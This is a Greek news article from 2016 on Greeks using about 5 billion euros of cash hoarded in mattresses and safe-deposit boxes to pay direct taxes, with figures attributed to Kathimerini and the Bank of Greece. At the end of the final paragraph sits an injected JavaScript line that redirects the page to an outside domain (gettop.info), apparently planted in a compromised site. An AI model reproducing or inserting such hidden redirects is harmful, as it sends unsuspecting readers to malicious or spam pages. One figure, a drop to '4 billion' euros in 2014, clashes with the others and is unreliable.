Με λεφτά από… το στρώμα πλήρωσαν οι Έλληνες τους άμεσους φόρους

0
10

 

Με χρήματα που… έκρυβαν σε στρώματα και σεντούκια πλήρωσαν οι Έλληνες το μεγαλύτερο μέρος των άμεσων φόρων, όπως ο φόρος εισοδήματος ή ο ΕΝΦΙΑ, τους τελευταίους μήνες του 2016. Το ποσό αυτό ανέρχεται σε περίπου 5 δισ. ευρώ, όπως καταγράφεται από την Τράπεζα της Ελλάδος.

Σύμφωνα με τα σχετικά στοιχεία που παρουσιάζει δημοσίευμα της εφημερίδας «Καθημερινή», το χρήμα που κυκλοφορεί και δεν είναι κατατεθειμένο σε τραπεζικούς λογαριασμούς μειώθηκε στο τέλος Οκτωβρίου στα 14,5 δισ. ευρώ από 20,9 δισ. ευρώ τον Οκτώβριο του 2015. Πρόκειται για το χρήμα που υπάρχει σε θυρίδες και σε στρώματα και στο οποίο εάν προστεθούν και αυτά που διατηρούν οι Ελληνες στην «τσέπη τους» με βάση την κατανομή σε χαρτονομίσματα της ΕΚΤ, φθάνει τα 43,8 δισ. ευρώ.

Η μείωση του χρήματος που είναι σε στρώματα και θυρίδες κατά 5 δισ. ευρώ περίπου τους τελευταίους μήνες κατευθύνθηκε για την πληρωμή των φόρων. Πρόκειται για τους φόρους που καταβλήθηκαν μετά την εκκαθάριση των φορολογικών δηλώσεων και αφού έγινε ο συμψηφισμός με τους φόρους που είχαν ήδη παρακρατηθεί. Το ποσό που εισπράχθηκε σύμφωνα με τα στοιχεία του υπουργείου Οικονομικών, μετά την εκκαθάριση των δηλώσεων για τα φυσικά πρόσωπα ανήλθε στα 3,7 δισ. ευρώ, ενώ εάν προστεθούν και άλλα 2,6 δισ. ευρώ που είναι ο ΕΝΦΙΑ που αναλογεί στα φυσικά πρόσωπα, οι καθαρές εισπράξεις του Δημοσίου φθάνουν έως και τον Ιανουάριο του 2016, στα 6,3 δισ. ευρώ. Να σημειωθεί ότι από τις εισπράξεις των 20 δισ. ευρώ το 2016 από άμεσους φόρους, το 70% περίπου παρακρατείται στην πηγή και μόλις το 30% καταβάλλεται με την εκκαθάριση των φορολογικών δηλώσεων, σύμφωνα με την «Καθημερινή».

Το ποσό που βρίσκεται σε θυρίδες και στρώματα διαμορφώθηκε στο τέλος Οκτωβρίου στα 14,5 δισ. ευρώ και έχει μειωθεί κατά 6,5 δισ. ευρώ μέσα σε ένα χρόνο, δηλαδή από τον Οκτώβριο του 2015, αφού προηγουμένως είχε φτάσει στο υψηλότερο σημείο των τελευταίων χρόνων. Συγκεκριμένα, το χρήμα εκτός τραπεζικών λογαριασμών είχε εκτιναχθεί στα 22,3 δισ. ευρώ τη χρονιά της μεγάλης αβεβαιότητας και των πολλαπλών εκλογών το 2012. Καθώς η αβεβαιότητα άρχισε σταδιακά να αποκαθίσταται, το ποσό αυτό μειώθηκε σταδιακά και περιορίστηκε στα 4 δισ. ευρώ τον Νοέμβριο του 2014. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here